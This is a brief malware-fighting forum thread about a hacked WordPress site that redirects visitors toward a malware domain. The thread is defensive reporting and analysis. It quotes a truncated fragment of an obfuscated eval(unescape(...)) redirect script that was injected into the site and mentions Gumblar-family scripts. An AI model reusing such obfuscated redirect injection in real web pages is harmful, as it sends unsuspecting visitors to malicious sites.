Hi malware fighters,

I landed here via a mistyped query (Typo) using the Google searchengine: eixhhezgzj dot bravehost dot com/“Typo”
and that then tried to reconnect to a chinese malcode site, website apparently hacked via a hole in WordPress 2.0.2 - Warning: Old version of WordPress. It may be vulnerable. Please upgrade…
This was the long suspicious Inline script

 eval(unescape('%70%61%72%65%6E%74%2E%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61...

See here: hxtp://www.computing.net/answers/security/malcious-code/26163.html

polonus

Hello polonus,

The link you have mention contains three script that belong to gumblar infection and all three are detected by avast. But the Code block looks different from those scripts, please let me know more info - infected website - chinese malware site urls.

Regards